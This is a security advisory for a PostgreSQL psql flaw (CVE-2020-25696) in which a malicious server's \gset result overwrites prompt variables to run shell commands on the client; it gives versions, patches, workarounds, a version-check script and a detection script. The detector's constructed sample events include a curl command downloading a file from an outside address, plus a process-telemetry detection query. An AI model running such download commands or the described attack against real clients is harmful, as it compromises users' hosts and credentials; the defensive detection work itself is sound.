CVE-2020-25696

Severity: 7.5 HIGH (CVSS v3.1 base score)

📋 TL;DR

psql, PostgreSQL's interactive terminal, can store a query result into psql variables with the \gset meta-command. Before the fix, \gset used without a prefix would overwrite whatever variables the server named in its result columns, including psql's specially treated variables such as PROMPT1, PROMPT2 and PROMPT3, which may contain backtick-quoted shell commands that psql runs whenever it renders the prompt. A compromised or attacker-controlled server can therefore answer a \gset query with a column named after one of those variables and have psql execute arbitrary commands on the client machine, as the operating system account running psql. The database server is not what gets compromised; the psql client and the host it runs on are. Anyone who runs an affected psql interactively against a server they do not fully control, and uses \gset without a prefix, is exposed.

💻 Affected Systems

Products:
  • PostgreSQL
Versions: 13.0; 12.x before 12.5; 11.x before 11.10; 10.x before 10.15; 9.6.x before 9.6.20; 9.5.x before 9.5.24 (older branches such as 9.4 were already end-of-life and were not fixed)
Operating Systems: Any platform where an affected psql client binary runs. It is the client host, not the database server, that is compromised.
Default Config Vulnerable: ⚠️ Yes (no psql setting turns the behaviour off)
Notes: Requires an interactive psql session that runs \gset without a prefix while connected to a compromised or attacker-controlled server. \gset with a prefix is not affected, because the prefix is prepended to every returned column name and the result cannot collide with a specially treated variable.

📦 What is this software?

PostgreSQL is an open-source relational database system. psql is its command-line client, used interactively by DBAs and developers and in scripts. The \gset meta-command runs the current query buffer and stores each column of the first result row into a psql variable named after that column, optionally with a prefix. psql variables also control the client's own behaviour; the PROMPT1, PROMPT2 and PROMPT3 variables in particular may contain `command` sequences that psql passes to the shell and substitutes with the command's output each time the prompt is displayed.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full compromise of the client host: the attacker runs commands as the operating system account that launched psql, typically a DBA or developer account holding database credentials (.pgpass), SSH keys and cloud or CI tokens, which enables data theft, destruction of the client's data, and lateral movement to the real database servers and other systems that account can reach.

🟠

Likely Case

Code execution on the client host with the psql user's privileges, allowing the attacker to read files that account can read, harvest stored database and infrastructure credentials, and connect onward to the servers the user administers.

🟢

If Mitigated

No impact once the psql binary is a fixed release, and none if \gset is only ever run with a prefix or only against servers you control.

🌐 Internet-Facing: MEDIUM - Requires interactive psql session and connection to compromised server, which is less common for internet-facing systems.
🏢 Internal Only: HIGH - Internal users frequently use interactive psql sessions for database administration and development work.

🎯 Exploit Status

Public PoC: No
Weaponized: UNKNOWN
Unauthenticated Exploit: No (the victim initiates the connection; the attacker needs no credentials on the victim's systems but must control or have compromised the server side)
Complexity: MEDIUM

Requires the attacker to control the PostgreSQL server that the victim connects to, or to compromise that server, or to trick the victim into connecting to a malicious one (for example through a tampered connection string, a hijacked DNS name, or a compromised bastion). The victim must then run \gset without a prefix in an interactive session; there is no error or visible indication when the variables are overwritten.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: PostgreSQL 13.1, 12.5, 11.10, 10.15, 9.6.20, and 9.5.24 (the fix is in the psql client binary shipped with these releases; fixed psql refuses to let \gset set specially treated variables)

Vendor Advisory: https://www.postgresql.org/about/news/postgresql-131-125-1110-1015-9620-and-9524-released-2111/

Restart Required: Yes, of psql itself: sessions already running keep the old binary until they exit. The database server does not need a restart for this particular fix, but the same releases also contain server-side fixes, so restart it if you update the server packages as well.

Instructions:

1. Inventory every host where psql is installed, not only database servers: DBA workstations, bastion hosts, CI runners and application servers carrying the client package (for example postgresql-client-12 on Debian/Ubuntu).
2. Record the current version on each with `psql --version`.
3. Upgrade the client package to a fixed minor release from your distribution or from the PostgreSQL website; upgrade the server package too where it is installed.
4. If the server package was updated, stop and restart the PostgreSQL service.
5. Close and reopen any psql sessions that were open during the upgrade.
6. Re-run `psql --version` on each host to confirm the fixed version is in PATH.

🔧 Temporary Workarounds

Use \gset only with a prefix

Applies to: all platforms

Run `\gset some_prefix_` rather than bare `\gset`. The prefix is prepended to every column name returned by the server, so the result can never land in PROMPT1 or another specially treated variable. This is the one workaround that removes the attack path while still letting scripts use \gset.

Avoid \gset against untrusted servers

Applies to: all platforms

Do not run \gset, in particular without a prefix, in interactive sessions connected to servers you do not administer or that may have been compromised. Treat connection strings, DNS names and bastion hops that lead to a PostgreSQL server as part of the trust boundary, since a redirected connection is enough.

Restrict psql usage

Applies to: all platforms

Limit interactive psql to trusted administrators, and enforce connection policies (egress firewall rules, allow-listed hosts in pg_service.conf or connection tooling) so that clients can only reach known-good servers.

🧯 If You Can't Patch

  • Standardise on `\gset prefix_` in scripts and in DBA habits, and never run bare \gset against a server you do not administer
  • Implement strict egress controls so admin workstations, bastions and CI runners can only reach the PostgreSQL servers they are meant to manage
  • Install a fixed client binary even where the server cannot be upgraded: the client and server packages are independent, and a 13.1+ psql talks to older servers
  • Treat any interactive session that used \gset against a suspicious server as a possible compromise of that user's account, and rotate .pgpass entries, SSH keys and cloud credentials accordingly

🔍 How to Verify

Check if Vulnerable:

Run `psql --version` on every host where psql is installed and compare against the affected versions list. The flaw is in the client, so the server version reported by `SELECT version()` tells you nothing about your exposure; a patched server with an unpatched psql on a DBA workstation is still vulnerable.

Check Version:

psql --version

Verify Fix Applied:

After patching, run `psql --version` on each client host and confirm it reports 13.1, 12.5, 11.10, 10.15, 9.6.20 or 9.5.24 (or a later release of the same branch, or any 14+ release). If several PostgreSQL installations coexist, check that the binary first in PATH is the patched one (`command -v psql`).
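The branch-by-branch comparison above is easy to get wrong by hand (9.6.20 is fixed, 12.4 is not, 13.0 is not). As an added example, not from the PostgreSQL project or the original advisory, this Python script parses `psql --version` output and compares the version against the fixed minor release of the matching branch. It assumes the standard `psql (PostgreSQL) X.Y` output format, which distribution builds keep ahead of their own suffix; the version strings used for the test cases are constructed.

```python
import re
import subprocess
from typing import Optional, Tuple

# Fixed minor releases named in the PostgreSQL 2020-11-12 advisory, one per branch.
FIXED_RELEASES = [(13, 1), (12, 5), (11, 10), (10, 15), (9, 6, 20), (9, 5, 24)]

# `psql --version` prints e.g. "psql (PostgreSQL) 12.5 (Debian 12.5-1.pgdg100+1)";
# the first dotted number is the upstream version, the rest is distro packaging.
VERSION_RE = re.compile(r"psql \(PostgreSQL\) (\d+(?:\.\d+)+)")


def parse_psql_version(output: str) -> Optional[Tuple[int, ...]]:
    """Return the upstream version as an int tuple, or None if the output is not psql's."""
    match = VERSION_RE.search(output)
    if not match:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def branch_of(version: Tuple[int, ...]) -> Tuple[int, ...]:
    """Major version is one component from 10 onward, two components before (9.5, 9.6)."""
    return version[:1] if version[0] >= 10 else version[:2]


def assess(output: str) -> str:
    """Classify `psql --version` output as fixed, vulnerable, unsupported or unknown."""
    version = parse_psql_version(output)
    if version is None:
        return "unknown"
    branch = branch_of(version)
    for fixed in FIXED_RELEASES:
        if branch_of(fixed) == branch:
            return "fixed" if version >= fixed else "vulnerable"
    # Branches released after November 2020 (14 and later) shipped with the fix.
    if branch > (13,):
        return "fixed"
    # 9.4 and older were end-of-life before the fix and never received it.
    return "unsupported"


if __name__ == "__main__":
    try:
        result = subprocess.run(["psql", "--version"], capture_output=True, text=True, check=False)
        banner = result.stdout.strip() or result.stderr.strip()
    except FileNotFoundError:
        banner = ""
    print(f"{banner or 'psql not found'} -> {assess(banner)}")
```

Run it on each client host rather than on the database server; "unsupported" means the branch needs a full upgrade, not a minor update.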

📡 Detection & Monitoring

Log Indicators:

  • PostgreSQL server logs (postgresql.log) cannot show this attack: \gset is a client-side meta-command that is never sent to the server, and the malicious server is not one you log anyway.
  • On client hosts, process-creation telemetry (auditd, Sysmon-style EDR) showing psql as the parent of a shell (`sh -c …`) whose command is not the pager or editor. psql legitimately spawns a shell for the pager (`less`, `more`), for `\e`, and for `\!`, so filter those and review the rest.
  • Inside a live session, `\set` with no arguments lists every psql variable; a PROMPT1, PROMPT2 or PROMPT3 value containing backticks that the user did not set is a direct indicator.

Network Indicators:

  • Connections from admin workstations, bastions or CI runners to PostgreSQL servers that are not in your inventory, on 5432 or any other port
  • Outbound connections from a client host to unfamiliar addresses shortly after a psql session was active, which is what an injected prompt command would produce

SIEM Query:

The following is a generic process-telemetry query; the field names follow Sysmon conventions (ParentImage, Image, CommandLine) and need adapting to your EDR. Tune the exclusion list to the pager and editor in use.

ParentImage="*/psql" AND Image IN ("*/sh", "*/bash", "*/dash") AND NOT (CommandLine="sh -c less" OR CommandLine="sh -c more" OR CommandLine="sh -c pspg*")
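The same logic over raw process-creation events, as an added example that is not part of the original page and not a PostgreSQL project tool: it walks a set of events, finds shells whose parent is psql, strips the `sh -c` wrapper, and flags anything that is not an expected pager or editor, attaching the server the psql session was connected to (taken from `-h`/`--host`). The events are constructed sample data, and the expected-children allow-list is an assumption to tune per environment; `\!` shell escapes produce identical telemetry, so findings need analyst review.

```python
import shlex
from collections import defaultdict
from posixpath import basename

# Constructed process-creation events (not real telemetry). pid 4101 is a psql
# session that first paged output normally and later spawned a shell running curl.
SAMPLE_EVENTS = [
    {"pid": 4101, "ppid": 3990, "image": "/usr/bin/psql",
     "cmdline": "psql -h db-analytics.example.net -U reporter analytics", "user": "alice"},
    {"pid": 4120, "ppid": 4101, "image": "/bin/sh", "cmdline": "sh -c less", "user": "alice"},
    {"pid": 4121, "ppid": 4120, "image": "/usr/bin/less", "cmdline": "less", "user": "alice"},
    {"pid": 4188, "ppid": 4101, "image": "/bin/sh",
     "cmdline": "sh -c 'curl -s http://203.0.113.7/x -o /tmp/.x'", "user": "alice"},
    {"pid": 4189, "ppid": 4188, "image": "/usr/bin/curl",
     "cmdline": "curl -s http://203.0.113.7/x -o /tmp/.x", "user": "alice"},
    {"pid": 5001, "ppid": 4990, "image": "/bin/sh", "cmdline": "sh -c ls", "user": "bob"},
]

SHELLS = {"sh", "bash", "dash", "zsh"}
# Commands psql legitimately launches through `sh -c`: the pager for long output
# and the editor for \e. Assumed defaults; adjust to PAGER/PSQL_PAGER/PSQL_EDITOR.
EXPECTED_CHILDREN = {"less", "more", "pspg", "vi", "vim", "nano", "editor"}


def shell_command(cmdline):
    """Return the command string passed to `sh -c`, or None if cmdline is not that shape."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if len(argv) >= 3 and basename(argv[0]) in SHELLS and argv[1] == "-c":
        return argv[2]
    return None


def psql_server(cmdline):
    """Best-effort extraction of the -h/--host argument from a psql command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    for i, arg in enumerate(argv):
        if arg in ("-h", "--host") and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("--host="):
            return arg.split("=", 1)[1]
        if arg.startswith("-h") and len(arg) > 2:
            return arg[2:]
    return None


def find_suspicious_psql_children(events):
    """Flag shells spawned by psql whose command is not an expected pager or editor."""
    children = defaultdict(list)
    for ev in events:
        children[ev["ppid"]].append(ev)

    findings = []
    for psql in events:
        if basename(psql["image"]) != "psql":
            continue
        for child in children[psql["pid"]]:
            cmd = shell_command(child["cmdline"])
            if cmd is None:
                continue
            try:
                first = shlex.split(cmd)[0] if cmd.strip() else ""
            except ValueError:
                first = ""  # unparsable quoting: keep it as a finding
            if basename(first) in EXPECTED_CHILDREN:
                continue
            findings.append({
                "user": psql["user"],
                "psql_pid": psql["pid"],
                "server": psql_server(psql["cmdline"]),
                "command": cmd,
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_psql_children(SAMPLE_EVENTS):
        print(f"user={f['user']} psql_pid={f['psql_pid']} server={f['server']} ran: {f['command']}")
```

On the sample data only the curl launch is reported, with the server it came from; the paged `less` and bob's unrelated shell are filtered. The server field is what lets you pivot to the network indicators above and decide whether that host belongs in your inventory.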

🔗 References

  • PostgreSQL release announcement: https://www.postgresql.org/about/news/postgresql-131-125-1110-1015-9620-and-9524-released-2111/
  • PostgreSQL security page for this CVE: https://www.postgresql.org/support/security/CVE-2020-25696/
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2020-25696